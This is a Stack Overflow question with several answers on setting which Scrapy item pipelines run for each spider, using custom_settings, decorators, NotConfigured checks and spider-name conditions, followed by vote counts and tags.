suppose we have many spiders(spider1,spider2,...........),in my example spider1 and spider5 can not use MyImagesPipeline settings.py ITEM_PIPELINES = {'scrapycrawler.pipelines.MyImagesPipeline' : 1,'scrapycrawler.pipelines.MongoPipeline' : 2} IMAGES_STORE = '/var/www/scrapycrawler/dowload' And bellow complete code of pipeline import scrapy import string import pymongo from scrapy.pipelines.images import ImagesPipeline class MyImagesPipeline(ImagesPipeline): def process_item(self, item, spider): if spider.name not in ['spider1', 'spider5']: return super(ImagesPipeline, self).process_item(item, spider) else: return item def file_path(self, request, response=None, info=None): image_name = string.split(request.url, '/')[-1] dir1 = image_name[0] dir2 = image_name[1] return dir1 + '/' + dir2 + '/' +image_name class MongoPipeline(object): collection_name = 'scrapy_items' collection_url='snapdeal_urls' def __init__(self, mongo_uri, mongo_db): self.mongo_uri = mongo_uri self.mongo_db = mongo_db @classmethod def from_crawler(cls, crawler): return cls( mongo_uri=crawler.settings.get('MONGO_URI'), mongo_db=crawler.settings.get('MONGO_DATABASE', 'scraping') ) def open_spider(self, spider): self.client = pymongo.MongoClient(self.mongo_uri) self.db = self.client[self.mongo_db] def close_spider(self, spider): self.client.close() def process_item(self, item, spider): #self.db[self.collection_name].insert(dict(item)) collection_name=item.get( 'collection_name', self.collection_name ) self.db[collection_name].insert(dict(item)) data = {} data['base_id'] = item['base_id'] self.db[self.collection_url].update({ 'base_id': item['base_id'] }, { '$set': { 'image_download': 1 } }, upsert=False, multi=True) return item A: we can use some conditions in pipeline as this # -*- coding: utf-8 -*- from scrapy_app.items import x class SaveItemPipeline(object): def process_item(self, item, spider): if isinstance(item, x,): item.save() return item A: Simple but still useful solution. Spider code def parse(self, response): item = {} ... do parse stuff item['info'] = {'spider': 'Spider2'} pipeline code def process_item(self, item, spider): if item['info']['spider'] == 'Spider1': logging.error('Spider1 pipeline works') elif item['info']['spider'] == 'Spider2': logging.error('Spider2 pipeline works') elif item['info']['spider'] == 'Spider3': logging.error('Spider3 pipeline works') Hope this save some time for somebody! A: Overriding 'ITEM_PIPELINES' with custom settings per spider, as others have suggested, works well. However, I found I had a few distinct groups of pipelines I wanted to use for different categories of spiders. I wanted to be able to easily define the pipeline for a particular category of spider without a lot of thought, and I wanted to be able to update a pipeline category without editing each spider in that category individually. So I created a new file called pipeline_definitions.py in the same directory as settings.py. pipeline_definitions.py contains functions like this: def episode_pipelines(): return { 'radio_scrape.pipelines.SaveEpisode': 100, } def show_pipelines(): return { 'radio_scrape.pipelines.SaveShow': 100, } Then in each spider I would import the specific function relevant for the spider: from radio_scrape.pipeline_definitions import episode_pipelines I then use that function in the custom settings assignment: class RadioStationAEspisodesSpider(scrapy.Spider): name = 'radio_station_A_episodes' custom_settings = { 'ITEM_PIPELINES': episode_pipelines() }
How can I use different pipelines for different spiders in a single Scrapy project
I have a scrapy project which contains multiple spiders. Is there any way I can define which pipelines to use for which spider? Not all the pipelines I have defined are applicable to every spider. Thanks
[ "Just remove all pipelines from main settings and use this inside spider.\nThis will define the pipeline to user per spider\nclass testSpider(InitSpider):\n name = 'test'\n custom_settings = {\n 'ITEM_PIPELINES': {\n 'app.MyPipeline': 400\n }\n }\n\n", "Building on the solution from Pablo Hoffman, you can use the following decorator on the process_item method of a Pipeline object so that it checks the pipeline attribute of your spider for whether or not it should be executed. For example:\ndef check_spider_pipeline(process_item_method):\n\n @functools.wraps(process_item_method)\n def wrapper(self, item, spider):\n\n # message template for debugging\n msg = '%%s %s pipeline step' % (self.__class__.__name__,)\n\n # if class is in the spider's pipeline, then use the\n # process_item method normally.\n if self.__class__ in spider.pipeline:\n spider.log(msg % 'executing', level=log.DEBUG)\n return process_item_method(self, item, spider)\n\n # otherwise, just return the untouched item (skip this step in\n # the pipeline)\n else:\n spider.log(msg % 'skipping', level=log.DEBUG)\n return item\n\n return wrapper\n\nFor this decorator to work correctly, the spider must have a pipeline attribute with a container of the Pipeline objects that you want to use to process the item, for example:\nclass MySpider(BaseSpider):\n\n pipeline = set([\n pipelines.Save,\n pipelines.Validate,\n ])\n\n def parse(self, response):\n # insert scrapy goodness here\n return item\n\nAnd then in a pipelines.py file:\nclass Save(object):\n\n @check_spider_pipeline\n def process_item(self, item, spider):\n # do saving here\n return item\n\nclass Validate(object):\n\n @check_spider_pipeline\n def process_item(self, item, spider):\n # do validating here\n return item\n\nAll Pipeline objects should still be defined in ITEM_PIPELINES in settings (in the correct order -- would be nice to change so that the order could be specified on the Spider, too).\n", "The other solutions given here are good, but I think they could be slow, because we are not really not using the pipeline per spider, instead we are checking if a pipeline exists every time an item is returned (and in some cases this could reach millions).\nA good way to completely disable (or enable) a feature per spider is using custom_setting and from_crawler for all extensions like this:\npipelines.py\nfrom scrapy.exceptions import NotConfigured\n\nclass SomePipeline(object):\n def __init__(self):\n pass\n\n @classmethod\n def from_crawler(cls, crawler):\n if not crawler.settings.getbool('SOMEPIPELINE_ENABLED'):\n # if this isn't specified in settings, the pipeline will be completely disabled\n raise NotConfigured\n return cls()\n\n def process_item(self, item, spider):\n # change my item\n return item\n\nsettings.py\nITEM_PIPELINES = {\n 'myproject.pipelines.SomePipeline': 300,\n}\nSOMEPIPELINE_ENABLED = True # you could have the pipeline enabled by default\n\nspider1.py\nclass Spider1(Spider):\n\n name = 'spider1'\n\n start_urls = [\"http://example.com\"]\n\n custom_settings = {\n 'SOMEPIPELINE_ENABLED': False\n }\n\nAs you check, we have specified custom_settings that will override the things specified in settings.py, and we are disabling SOMEPIPELINE_ENABLED for this spider.\nNow when you run this spider, check for something like:\n[scrapy] INFO: Enabled item pipelines: []\n\nNow scrapy has completely disabled the pipeline, not bothering of its existence for the whole run. 
Check that this also works for scrapy extensions and middlewares.\n", "You can use the name attribute of the spider in your pipeline\nclass CustomPipeline(object)\n\n def process_item(self, item, spider)\n if spider.name == 'spider1':\n # do something\n return item\n return item\n\nDefining all pipelines this way can accomplish what you want.\n", "I can think of at least four approaches:\n\nUse a different scrapy project per set of spiders+pipelines (might be appropriate if your spiders are different enough warrant being in different projects)\nOn the scrapy tool command line, change the pipeline setting with scrapy settings in between each invocation of your spider\nIsolate your spiders into their own scrapy tool commands, and define the default_settings['ITEM_PIPELINES'] on your command class to the pipeline list you want for that command. See line 6 of this example.\nIn the pipeline classes themselves, have process_item() check what spider it's running against, and do nothing if it should be ignored for that spider. See the example using resources per spider to get you started. (This seems like an ugly solution because it tightly couples spiders and item pipelines. You probably shouldn't use this one.)\n\n", "The most simple and effective solution is to set custom settings in each spider itself.\ncustom_settings = {'ITEM_PIPELINES': {'project_name.pipelines.SecondPipeline': 300}}\n\nAfter that you need to set them in the settings.py file\nITEM_PIPELINES = {\n 'project_name.pipelines.FistPipeline': 300,\n 'project_name.pipelines.SecondPipeline': 400\n}\n\nin that way each spider will use the respective pipeline.\n", "You can just set the item pipelines settings inside of the spider like this:\nclass CustomSpider(Spider):\n name = 'custom_spider'\n custom_settings = {\n 'ITEM_PIPELINES': {\n '__main__.PagePipeline': 400,\n '__main__.ProductPipeline': 300,\n },\n 'CONCURRENT_REQUESTS_PER_DOMAIN': 2\n }\n\nI can then split up a pipeline (or even use multiple pipelines) by adding a value to the loader/returned item that identifies which part of the spider sent items over. This way I won’t get any KeyError exceptions and I know which items should be available. 
\n ...\n def scrape_stuff(self, response):\n pageloader = PageLoader(\n PageItem(), response=response)\n\n pageloader.add_xpath('entire_page', '/html//text()')\n pageloader.add_value('item_type', 'page')\n yield pageloader.load_item()\n\n productloader = ProductLoader(\n ProductItem(), response=response)\n\n productloader.add_xpath('product_name', '//span[contains(text(), \"Example\")]')\n productloader.add_value('item_type', 'product')\n yield productloader.load_item()\n\nclass PagePipeline:\n def process_item(self, item, spider):\n if item['item_type'] == 'product':\n # do product stuff\n\n if item['item_type'] == 'page':\n # do page stuff\n\n", "I am using two pipelines, one for image download (MyImagesPipeline) and second for save data in mongodb (MongoPipeline).\nsuppose we have many spiders(spider1,spider2,...........),in my example spider1 and spider5 can not use MyImagesPipeline\nsettings.py\nITEM_PIPELINES = {'scrapycrawler.pipelines.MyImagesPipeline' : 1,'scrapycrawler.pipelines.MongoPipeline' : 2}\nIMAGES_STORE = '/var/www/scrapycrawler/dowload'\n\nAnd bellow complete code of pipeline\nimport scrapy\nimport string\nimport pymongo\nfrom scrapy.pipelines.images import ImagesPipeline\n\nclass MyImagesPipeline(ImagesPipeline):\n def process_item(self, item, spider):\n if spider.name not in ['spider1', 'spider5']:\n return super(ImagesPipeline, self).process_item(item, spider)\n else:\n return item \n\n def file_path(self, request, response=None, info=None):\n image_name = string.split(request.url, '/')[-1]\n dir1 = image_name[0]\n dir2 = image_name[1]\n return dir1 + '/' + dir2 + '/' +image_name\n\nclass MongoPipeline(object):\n\n collection_name = 'scrapy_items'\n collection_url='snapdeal_urls'\n\n def __init__(self, mongo_uri, mongo_db):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DATABASE', 'scraping')\n )\n\n def open_spider(self, spider):\n self.client = pymongo.MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n\n def close_spider(self, spider):\n self.client.close()\n\n def process_item(self, item, spider):\n #self.db[self.collection_name].insert(dict(item))\n collection_name=item.get( 'collection_name', self.collection_name )\n self.db[collection_name].insert(dict(item))\n data = {}\n data['base_id'] = item['base_id']\n self.db[self.collection_url].update({\n 'base_id': item['base_id']\n }, {\n '$set': {\n 'image_download': 1\n }\n }, upsert=False, multi=True)\n return item\n\n", "we can use some conditions in pipeline as this\n # -*- coding: utf-8 -*-\nfrom scrapy_app.items import x\n\nclass SaveItemPipeline(object):\n def process_item(self, item, spider):\n if isinstance(item, x,):\n item.save()\n return item\n\n", "Simple but still useful solution.\nSpider code\n def parse(self, response):\n item = {}\n ... do parse stuff\n item['info'] = {'spider': 'Spider2'}\n\npipeline code\n def process_item(self, item, spider):\n if item['info']['spider'] == 'Spider1':\n logging.error('Spider1 pipeline works')\n elif item['info']['spider'] == 'Spider2':\n logging.error('Spider2 pipeline works')\n elif item['info']['spider'] == 'Spider3':\n logging.error('Spider3 pipeline works')\n\nHope this save some time for somebody!\n", "Overriding 'ITEM_PIPELINES' with custom settings per spider, as others have suggested, works well. 
However, I found I had a few distinct groups of pipelines I wanted to use for different categories of spiders. I wanted to be able to easily define the pipeline for a particular category of spider without a lot of thought, and I wanted to be able to update a pipeline category without editing each spider in that category individually.\nSo I created a new file called pipeline_definitions.py in the same directory as settings.py. pipeline_definitions.py contains functions like this:\ndef episode_pipelines():\n return {\n 'radio_scrape.pipelines.SaveEpisode': 100,\n }\n\ndef show_pipelines():\n return {\n 'radio_scrape.pipelines.SaveShow': 100,\n }\n\nThen in each spider I would import the specific function relevant for the spider:\nfrom radio_scrape.pipeline_definitions import episode_pipelines\n\nI then use that function in the custom settings assignment:\nclass RadioStationAEspisodesSpider(scrapy.Spider):\n name = 'radio_station_A_episodes' \n custom_settings = {\n 'ITEM_PIPELINES': episode_pipelines()\n }\n\n" ]
[ 169, 39, 17, 15, 12, 10, 6, 1, 1, 0, 0 ]
[]
[]
[ "python", "scrapy", "web_crawler" ]
stackoverflow_0008372703_python_scrapy_web_crawler.txt
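For reference, a compact sketch of the per-spider custom_settings pattern that several answers above recommend; the project, spider and pipeline names here are hypothetical.

import scrapy

class ProductSpider(scrapy.Spider):
    name = "products"
    start_urls = ["https://example.com"]
    # Only this spider runs CleanPipeline; other spiders keep the
    # project-wide ITEM_PIPELINES from settings.py
    custom_settings = {
        "ITEM_PIPELINES": {"myproject.pipelines.CleanPipeline": 300},
    }

    def parse(self, response):
        yield {"url": response.url}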
Q: unexpected "None" in list i wanted to make a game where you guess the letter. and add a function that will show you all you incorrect guesses, so i made the list: incorrectguesses = [] and then i made it so it asks the user to guess the letter: while True: guess = input("what do you think the letter is?? ") if guess == secret_letter: print("you guessed it!") break else: incorrectguesses += [guess] and you can see that i added the guess to the list if it was wrong. then, i added a function to print out every item in the given list: def print_all_items(list_): for x in list_: print(x) and then i ran the function at the end of the loop: print(print_all_items(incorrectguesses)) but this was the result: what do you think the letter is?? a a None what do you think the letter is?? b a b None as you can see, it adds "None" to the end of the list. thanks if you could help me A: print(print_all_items(incorrectguesses)) You're printing the result of the print_all_items() function. However, that function has no return statement, so it returns None by default. So, the result of the function is None, and that gets printed. Since the function itself prints the results, I think you actually just want to call the function, not print its result. A: As someone else pointed earlier (beat me to it), it's because you are printing a function that has no return. (In depth explanation a the end). while True: guess = input("what do you think the letter is?? ") if guess == secret_letter: print("you guessed it!") break else: incorrectguesses += [guess] print_all_items(incorrectguesses) # ← You want to call the function, not print it. That way the function is being run, and prints the elements of incorrectguesses. Explanation When you do print(<something>), the print() function is waiting for a value to be returned. In this case because the <something> is a function, Python runs that function "inside" the print(). When your function print_all_items() is being run, it prints all the elements of the list. Once print_all_items() has finished running, and printed everything, the function doesn't return a value, so it defaults to None. Therefore, the value of the <something> the print(<something>) was waiting for is gets assigned a None value. I hope I could help!
unexpected "None" in list
I wanted to make a game where you guess the letter, and add a function that will show you all your incorrect guesses, so I made the list: incorrectguesses = [] and then I made it so it asks the user to guess the letter: while True: guess = input("what do you think the letter is?? ") if guess == secret_letter: print("you guessed it!") break else: incorrectguesses += [guess] and you can see that I added the guess to the list if it was wrong. Then, I added a function to print out every item in the given list: def print_all_items(list_): for x in list_: print(x) and then I ran the function at the end of the loop: print(print_all_items(incorrectguesses)) but this was the result: what do you think the letter is?? a a None what do you think the letter is?? b a b None as you can see, it adds "None" to the end of the list. Thanks if you could help me
[ "print(print_all_items(incorrectguesses))\n\nYou're printing the result of the print_all_items() function.\nHowever, that function has no return statement, so it returns None by default.\nSo, the result of the function is None, and that gets printed.\nSince the function itself prints the results, I think you actually just want to call the function, not print its result.\n", "As someone else pointed earlier (beat me to it), it's because you are printing a function that has no return. (In depth explanation a the end).\nwhile True:\n guess = input(\"what do you think the letter is?? \")\nif guess == secret_letter:\n print(\"you guessed it!\")\n break\nelse:\n incorrectguesses += [guess]\n print_all_items(incorrectguesses) # ←\n\nYou want to call the function, not print it.\nThat way the function is being run, and prints the elements of incorrectguesses.\n\nExplanation\nWhen you do print(<something>), the print() function is waiting for a value to be returned.\nIn this case because the <something> is a function, Python runs that function \"inside\" the print(). When your function print_all_items() is being run, it prints all the elements of the list. Once print_all_items() has finished running, and printed everything, the function doesn't return a value, so it defaults to None. Therefore, the value of the <something> the print(<something>) was waiting for is gets assigned a None value.\nI hope I could help!\n" ]
[ 3, 0 ]
[]
[]
[ "python", "python_3.x" ]
stackoverflow_0074593024_python_python_3.x.txt
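A short sketch of the return-based alternative to the accepted fix: have the function build and return the text instead of printing it, so print() receives a real value rather than None.

def format_all_items(items):
    # Join the guesses into one string and hand it back to the caller
    return "\n".join(items)

incorrect_guesses = ["a", "b"]
print(format_all_items(incorrect_guesses))  # prints "a" and "b", no trailing None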
Q: Producing probability of wins in Python craps game I have the logic down for this game of craps. My only problem right now is that I can't seem to get any output for finding the probability of wins for the game. Here is the code: from random import seed, randint def simulate(): die1 = randint(1, 6) die2 = randint(1, 6) roll = die1 + die2 first_roll = roll if first_roll == 7 or first_roll == 11: return True elif first_roll == 2 or first_roll == 3 or first_roll == 12: return False else: second_roll = randint(1, 6) + randint(1, 6) while second_roll != first_roll and second_roll != 7: if second_roll == first_roll: return True elif second_roll == 7: return False ## Main def probability(n): simulate() wins = 0 for i in range(n): if simulate() == 1: wins += 1 return print(probability(10000)) I want to find the probability of wins for 10000 trials. However, I don't get any output when running this code. Nothing shows up. Where am I going wrong on this? I have tried for a couple hours but nothing seems to be working for me. Please include code and what I was doing wrong. I know for a fact that it should be 49% but I can't seem to arrive at that answer. A: I am sorry for my earlier answer, I didn't read that it's a craps game. from random import seed, randint def simulate(): die1 = randint(1, 6) die2 = randint(1, 6) roll = die1 + die2 first_roll = roll if first_roll == 7 or first_roll == 11: return True elif first_roll == 2 or first_roll == 3 or first_roll == 12: return False else: while True: second_roll = randint(1, 6) + randint(1, 6) if second_roll == first_roll: return True elif second_roll == 7: return False # Main def probability(n): wins = 0 for i in range(n): if simulate() == 1: wins += 1 return wins print(probability(100000)) I think this is the answer. I changed the second part of simulate() so that it returns True when second_roll == first_roll, returns False when second_roll == 7, and repeats the while loop if second_roll is any other number.
Producing probability of wins in Python craps game
I have the logic down for this game of craps. My only problem right now is that I can't seem to get any output for finding the probability of wins for the game. Here is the code: from random import seed, randint def simulate(): die1 = randint(1, 6) die2 = randint(1, 6) roll = die1 + die2 first_roll = roll if first_roll == 7 or first_roll == 11: return True elif first_roll == 2 or first_roll == 3 or first_roll == 12: return False else: second_roll = randint(1, 6) + randint(1, 6) while second_roll != first_roll and second_roll != 7: if second_roll == first_roll: return True elif second_roll == 7: return False ## Main def probability(n): simulate() wins = 0 for i in range(n): if simulate() == 1: wins += 1 return print(probability(10000)) I want to find the probability of wins for 10000 trials. However, I don't get any output when running this code. Nothing shows up. Where am I going wrong on this? I have tried for a couple hours but nothing seems to be working for me. Please include code and what I was doing wrong. I know for a fact that it should be 49% but I can't seem to arrive at that answer.
[ "I am sorry for my latest answer, I didn't read that its craps game.\nfrom random import seed, randint\n\ndef simulate():\n die1 = randint(1, 6)\n die2 = randint(1, 6)\n roll = die1 + die2\n\n first_roll = roll\n\n if first_roll == 7 or first_roll == 11:\n return True\n elif first_roll == 2 or first_roll == 3 or first_roll == 12:\n return False\n else:\n while True:\n second_roll = randint(1, 6) + randint(1, 6)\n\n if second_roll == first_roll:\n return True\n elif second_roll == 7:\n return False\n \n\n\n# Main\ndef probability(n):\n wins = 0\n for i in range(n):\n if simulate() == 1:\n wins += 1\n return wins\n\n\nprint(probability(100000))\n\nI think its the answer, I changed the second part of simulate()\nwhere its returning True, when second_roll == first_roll, returning False when second_roll==7, and repeats that while loop by continue, if second_roll is equal to other number.\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074592980_python.txt
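One further tweak, assuming the simulate() from the answer above: dividing the win count by the number of trials turns it into the probability the asker wanted (True counts as 1 in sum()).

def probability(n):
    wins = sum(simulate() for _ in range(n))
    return wins / n  # fraction of games won; roughly 0.49 for craps

print(probability(100_000))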
Q: How would I put an API's output into different variables in Python? So I am using a riddle API and whenever it is run it outputs its data like this: [ { "title": "The Magic House", "question": "There is a house,if it rains ,there is water in it and if it doesn't rain,there is water in it.what kind of house is that?", "answer": "bathroom" } ] How could I convert the title, question and answer from the API output into 3 different variables that could then be used in a program? If the API outputs Title = A, the question = B, and answer = C, then how would I make it so that in my code Variable1 = A, Variable2 = B and Variable3 = C? The API comes from API Ninjas and here is the code provided with it: import requests api_url = 'https://api.api-ninjas.com/v1/riddles' response = requests.get(api_url, headers={'X-Api-Key': 'YOUR_API_KEY'}) if response.status_code == requests.codes.ok: print(response.text) else: print("Error:", response.status_code, response.text) How would I do this with the code provided? A: The response you received from the server looks like JSON so use json module to parse it. When you parse the response, you access the items like normal python list/dict: import json response_text = """[ { "title": "The Magic House", "question": "There is a house,if it rains ,there is water in it and if it doesn't rain,there is water in it.what kind of house is that?", "answer": "bathroom" } ]""" data = json.loads(response_text) for item in data: print("Title =", item["title"]) print("Question =", item["question"]) print("Answer =", item["answer"]) print(data) Prints: Title = The Magic House Question = There is a house,if it rains ,there is water in it and if it doesn't rain,there is water in it.what kind of house is that? Answer = bathroom
How would I put an API's output into different variables in Python?
So I am using a riddle API and whenever it is run it outputs its data like this: [ { "title": "The Magic House", "question": "There is a house,if it rains ,there is water in it and if it doesn't rain,there is water in it.what kind of house is that?", "answer": "bathroom" } ] How could I convert the title, question and answer from the API output into 3 different variables that could then be used in a program? If the API outputs Title = A, the question = B, and answer = C, then how would I make it so that in my code Variable1 = A, Variable2 = B and Variable3 = C? The API comes from API Ninjas and here is the code provided with it: import requests api_url = 'https://api.api-ninjas.com/v1/riddles' response = requests.get(api_url, headers={'X-Api-Key': 'YOUR_API_KEY'}) if response.status_code == requests.codes.ok: print(response.text) else: print("Error:", response.status_code, response.text) How would I do this with the code provided?
[ "The response you received from the server looks like JSON so use json module to parse it. When you parse the response, you access the items like normal python list/dict:\nimport json\n\nresponse_text = \"\"\"[\n {\n \"title\": \"The Magic House\",\n \"question\": \"There is a house,if it rains ,there is water in it and if it doesn't rain,there is water in it.what kind of house is that?\",\n \"answer\": \"bathroom\"\n }\n]\"\"\"\n\ndata = json.loads(response_text)\n\nfor item in data:\n print(\"Title =\", item[\"title\"])\n print(\"Question =\", item[\"question\"])\n print(\"Answer =\", item[\"answer\"])\n\nprint(data)\n\nPrints:\nTitle = The Magic House\nQuestion = There is a house,if it rains ,there is water in it and if it doesn't rain,there is water in it.what kind of house is that?\nAnswer = bathroom\n\n" ]
[ 1 ]
[]
[]
[ "api", "python", "python_3.9", "python_requests" ]
stackoverflow_0074592338_api_python_python_3.9_python_requests.txt
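Applied to the asker's snippet, response.json() parses the body directly, without going through json.loads(response.text). This sketch assumes the API returns a one-element list, as in the sample output above.

import requests

api_url = "https://api.api-ninjas.com/v1/riddles"
response = requests.get(api_url, headers={"X-Api-Key": "YOUR_API_KEY"})
if response.status_code == requests.codes.ok:
    riddle = response.json()[0]  # first (and only) riddle in the returned list
    title = riddle["title"]
    question = riddle["question"]
    answer = riddle["answer"]
    print(title, question, answer, sep="\n")
else:
    print("Error:", response.status_code, response.text)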
Q: Selenium clicking a specific button object from a list of objects with python I am grabbing a list of buttons, then I am attempting to click a specific button object, I collect all buttons (which contain details such as a name). I check the name, if I have already clicked on this button, pass, or else click this button object. The problem I am having is that the button doesn't have an ID so I am unsure of how to dynamically identify the button to click it (from the object in the loop). It doesn't have an HREF either. If it had an ID, I could grab the ID value and build a selenium click even such as browser.find_element(By.ID, "button-ID").click(). Any pointers would be appreciated. html = browser.page_source soup = BeautifulSoup(html, "lxml") buttons = soup.find_all('button', {'class', 'full-width'}) for button in buttons: button_soup = BeautifulSoup(str(button), 'lxml') name_div = button_soup.find('div', {'class': 'artdeco-entity-lockup__title'}) name = name_div.find('span', {'aria-hidden': 'true'}).text if name in lead_check: pass else: """HERE IS WHERE I NEED TO CLICK THE BUTTON OBJECT""" browser.find_element(By.CSS_SELECTOR, "button.full-width").click() Button Object (one button from loop) example <button class="full-width member-analytics-addon__cta-list-item-content member-analytics-addon-entity-list__link member-analytics-addon-entity-list__link--no-underline-hover" role="button" type="button"> <div class="member-analytics-addon-entity-list__entity artdeco-entity-lockup artdeco-entity-lockup--size-3 ember-view" id="112"> <div class="artdeco-entity-lockup__image artdeco-entity-lockup__image--type-circle ember-view" id="113" type="circle"> <div class="ivm-image-view-model"> <div class="ivm-view-attr__img-wrapper ivm-view-attr__img-wrapper--use-img-tag display-flex"> <!-- --> <img alt="" class="ivm-view-attr__img--centered EntityPhoto-circle-3 EntityPhoto-circle-3 lazy-image ember-view" height="48" id="114" loading="lazy" src="linktopic" width="48"/> </div> </div> <!-- --> </div> <div class="artdeco-entity-lockup__content ember-view member-analytics-addon-entity-list__entity-content" id="115"> <div> <div class="artdeco-entity-lockup__title ember-view member-analytics-addon-entity-list__entity-content-title" id="116"> <span dir="ltr"><span aria-hidden="true"><!-- -->John Smith<!-- --></span><span class="visually-hidden"><!-- -->View Johns’s profile<!-- --></span></span> </div> <div class="artdeco-entity-lockup__badge ember-view t-normal" id="117"><!-- --> <span aria-hidden="false" class="artdeco-entity-lockup__degree"> · 3rd </span> <!-- --><!-- --></div> <div class="artdeco-entity-lockup__subtitle ember-view" id="118"> <!-- -->Loves cats<!-- --> </div> <!-- --> </div> <!-- --> </div> </div> </button> A: I solved this by identifying a unique variable in each button, in this instance an IMG URL then dynamically located each with selenium. img_src = button_soup.find('img')['src'] path_location = "//img[contains(@src,'{}')]".format(img_src) browser.find_element(By.XPATH, path_location).click()
Selenium clicking a specific button object from a list of objects with python
I am grabbing a list of buttons, then I am attempting to click a specific button object, I collect all buttons (which contain details such as a name). I check the name, if I have already clicked on this button, pass, or else click this button object. The problem I am having is that the button doesn't have an ID so I am unsure of how to dynamically identify the button to click it (from the object in the loop). It doesn't have an HREF either. If it had an ID, I could grab the ID value and build a selenium click even such as browser.find_element(By.ID, "button-ID").click(). Any pointers would be appreciated. html = browser.page_source soup = BeautifulSoup(html, "lxml") buttons = soup.find_all('button', {'class', 'full-width'}) for button in buttons: button_soup = BeautifulSoup(str(button), 'lxml') name_div = button_soup.find('div', {'class': 'artdeco-entity-lockup__title'}) name = name_div.find('span', {'aria-hidden': 'true'}).text if name in lead_check: pass else: """HERE IS WHERE I NEED TO CLICK THE BUTTON OBJECT""" browser.find_element(By.CSS_SELECTOR, "button.full-width").click() Button Object (one button from loop) example <button class="full-width member-analytics-addon__cta-list-item-content member-analytics-addon-entity-list__link member-analytics-addon-entity-list__link--no-underline-hover" role="button" type="button"> <div class="member-analytics-addon-entity-list__entity artdeco-entity-lockup artdeco-entity-lockup--size-3 ember-view" id="112"> <div class="artdeco-entity-lockup__image artdeco-entity-lockup__image--type-circle ember-view" id="113" type="circle"> <div class="ivm-image-view-model"> <div class="ivm-view-attr__img-wrapper ivm-view-attr__img-wrapper--use-img-tag display-flex"> <!-- --> <img alt="" class="ivm-view-attr__img--centered EntityPhoto-circle-3 EntityPhoto-circle-3 lazy-image ember-view" height="48" id="114" loading="lazy" src="linktopic" width="48"/> </div> </div> <!-- --> </div> <div class="artdeco-entity-lockup__content ember-view member-analytics-addon-entity-list__entity-content" id="115"> <div> <div class="artdeco-entity-lockup__title ember-view member-analytics-addon-entity-list__entity-content-title" id="116"> <span dir="ltr"><span aria-hidden="true"><!-- -->John Smith<!-- --></span><span class="visually-hidden"><!-- -->View Johns’s profile<!-- --></span></span> </div> <div class="artdeco-entity-lockup__badge ember-view t-normal" id="117"><!-- --> <span aria-hidden="false" class="artdeco-entity-lockup__degree"> · 3rd </span> <!-- --><!-- --></div> <div class="artdeco-entity-lockup__subtitle ember-view" id="118"> <!-- -->Loves cats<!-- --> </div> <!-- --> </div> <!-- --> </div> </div> </button>
[ "I solved this by identifying a unique variable in each button, in this instance an IMG URL then dynamically located each with selenium.\nimg_src = button_soup.find('img')['src']\npath_location = \"//img[contains(@src,'{}')]\".format(img_src)\nbrowser.find_element(By.XPATH, path_location).click()\n\n" ]
[ 0 ]
[]
[]
[ "beautifulsoup", "python", "selenium" ]
stackoverflow_0074586418_beautifulsoup_python_selenium.txt
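The same idea works with any attribute that is unique per button. For example, one could match on the visible name via XPath instead of the image URL; this sketch assumes browser is the asker's WebDriver and that the name appears in exactly one button.

from selenium.webdriver.common.by import By

name = "John Smith"  # hypothetical target taken from the parsed button
xpath = (
    "//button[contains(@class, 'full-width')]"
    f"[.//span[@aria-hidden='true' and contains(., '{name}')]]"
)
browser.find_element(By.XPATH, xpath).click()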
Q: Using custom yolov7 trained model on my screen What I know I have already trained a custom model using yolov7-tiny I am now trying to use it for object detection on screen The script I have: import mss import numpy as np import cv2 import time import keyboard import torch from hubconf import custom model = custom(path_or_model='yolov7-tiny-custom.pt') with mss.mss() as sct: monitor = {'top': 30, 'left': 0, 'width': 1152, 'height': 864} while True: t = time.time() img = np.array(sct.grab(monitor)) results = model(img) cv2.imshow('s', np.squeeze(results.render())) print('fps: {}'.format(1 / (time.time() - t))) cv2.waitKey(1) if keyboard.is_pressed('q'): break cv2.destroyAllWindows() The problem I know that everything works in that script, however when it finally detects an object, it wants to draw a rectangle on screen. I receive the following error: Traceback (most recent call last): File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\aimbot.py", line 20, in <module> cv2.imshow('s', np.squeeze(results.render())) File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\models\common.py", line 990, in render self.display(render=True) # render results File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\models\common.py", line 964, in display plot_one_box(box, img, label=label, color=colors[int(cls) % 10]) File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\utils\plots.py", line 62, in plot_one_box cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA) cv2.error: OpenCV(4.6.0) :-1: error: (-5:Bad argument) in function 'rectangle' > Overload resolution failed: > - Layout of the output array img is incompatible with cv::Mat > - Expected Ptr<cv::UMat> for argument 'img' > - argument for rectangle() given by name ('thickness') and position (4) > - argument for rectangle() given by name ('thickness') and position (4) Summary I'm not too sure whats going on here but I believe that when I take the screenshot, I convert it to an array and apply my model. When it wants to draw a rectangle, its unable to do so because the output array img is incompatible with OpenCV matrix. How can I fix that? A: I tried to reproduce your issue and combined your code with an available yolo-demo, but I couldn't find any issue that would return an error message like that in your question. You can check it in your environment: import mss import numpy as np import cv2 import torch import time model = torch.hub.load('ultralytics/yolov5', 'yolov5s') with mss.mss() as sct: monitor = {'top': 50, 'left': 50, 'width': 600, 'height': 400} while True: t = time.time() img = np.array(sct.grab(monitor)) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) results = model(img) results.render() out = cv2.cvtColor(img, cv2.COLOR_RGB2BGR) cv2.imshow('s', out) print('fps: {}'.format(1 / (time.time() - t))) if cv2.waitKey(1) == 27: break cv2.destroyAllWindows() Output:
Using custom yolov7 trained model on my screen
